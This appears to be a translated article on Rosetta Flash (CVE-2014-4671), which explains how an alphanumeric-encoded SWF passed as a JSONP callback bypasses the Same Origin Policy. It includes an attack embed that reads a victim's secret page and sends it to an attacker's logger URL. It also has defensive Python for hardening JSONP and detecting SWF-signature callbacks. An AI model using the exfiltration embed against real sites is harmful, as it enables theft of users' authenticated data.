
Rosetta Flash - SWF encoding for calling from JSONP

Michele Spagnuolo, a security specialist at Google, wrote a utility that can encode any SWF file using any chosen dictionary of characters.
Why is this needed? It is very simple: such a file can be passed as the callback parameter of a JSONP endpoint on the site whose data you want to read, which lets you bypass the Same Origin Policy.
The problem had been known for a long time, but it received little attention because it was extremely hard to produce a SWF file consisting only of characters that are accepted as a callback parameter. Now such a tool exists.
The utility uses zlib, a Huffman algorithm and brute-forcing of the ADLER32 checksum.

Among large services, the following were vulnerable:

How was the vulnerability exploited?


Suppose there are two domains: miki.net, controlled by us, and trovatel.net, the one we want to attack.

On trovatel.net there is a JSONP script that accepts a parameter made of printable characters:
http://trovatel.net/vulnerable_jsonp.php?callback=

There is also a secret page that returns a secret when it is requested with the right cookie:
http://trovatel.net/secret/secret.php


When the user visits the miki.it/RosettaFlash page, the following code is waiting for them:
    <object type="application/x-shockwave-flash"
            data="http://trovatel.net/vulnerable_jsonp.php?callback=CWSMI…"
            width="1" height="1">
        <param name="FlashVars"
               value="url=http://trovatel.net/secret/secret.php&exfiltrate=http://miki.it/RosettaFlash/log.php">
    </object>

Where miki.it/RosettaFlash/log.php is a logger script.

The user's browser downloads the SWF file as if it came from trovatel.net; the SWF then opens the secret page (with the correct cookie, of course) and sends its contents to the attacker's remote server. Everything is quite simple and typical.

Adobe has since released a Flash Player update that makes exploitation of this vulnerability impossible.
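Site owners do not have to rely on the client being patched: the JSONP endpoint itself can refuse to serve a reflected callback as a SWF. The example below is added here and is not code from the article or from the Rosetta Flash tool; it assumes a hypothetical endpoint named like the one above and uses constructed log lines. It validates the callback name, prefixes the response with /**/ (Flash Player requires the SWF magic bytes at offset 0, so a response that does not begin with the reflected callback can never be loaded as a SWF), and flags callback values in an access log that start with the SWF signatures CWS, FWS or ZWS.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request log lines (not from the article) against the kind of JSONP endpoint
# described above; the CWS... callback stands in for an alphanumeric-encoded SWF.
SAMPLE_LOG = """\
GET /vulnerable_jsonp.php?callback=parseResponse HTTP/1.1
GET /vulnerable_jsonp.php?callback=CWSconstructedFlashPayloadAAAAAAAA HTTP/1.1
GET /vulnerable_jsonp.php?callback=jQuery17_cb HTTP/1.1
"""

# Compressed (zlib), uncompressed and LZMA SWF files start with one of these three signatures.
SWF_MAGIC = ("CWS", "FWS", "ZWS")
# Only plain JavaScript identifiers (optionally dotted) are accepted as callback names.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def is_safe_callback(name: str) -> bool:
    """Reject anything that is not an identifier or that could be the start of a SWF."""
    return bool(CALLBACK_RE.match(name)) and len(name) <= 64 and not name.startswith(SWF_MAGIC)


def build_jsonp(callback: str, data: dict):
    """Return (headers, body) for a hardened JSONP reply; raises on an unsafe callback."""
    if not is_safe_callback(callback):
        raise ValueError("invalid callback name")
    # The leading /**/ is the key mitigation: the reflected text no longer sits at offset 0,
    # so Flash Player cannot interpret the response as a SWF even if the name is SWF-shaped.
    body = "/**/" + callback + "(" + json.dumps(data) + ");"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",          # stop MIME sniffing of the reply
        "Content-Disposition": "attachment; filename=f.txt",  # never rendered as a plugin object
    }
    return headers, body


def flag_swf_callbacks(log_text: str) -> list:
    """Detection: return callback values in an access log that begin with SWF magic bytes."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        query = parse_qs(urlsplit(parts[1]).query)
        for cb in query.get("callback", []):
            if cb.startswith(SWF_MAGIC):
                hits.append(cb)
    return hits
```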

Links


Information in the author's blog
More information in PDF
Utility on Github
CVE-2014-4671

Source: https://habr.com/ru/post/229639/

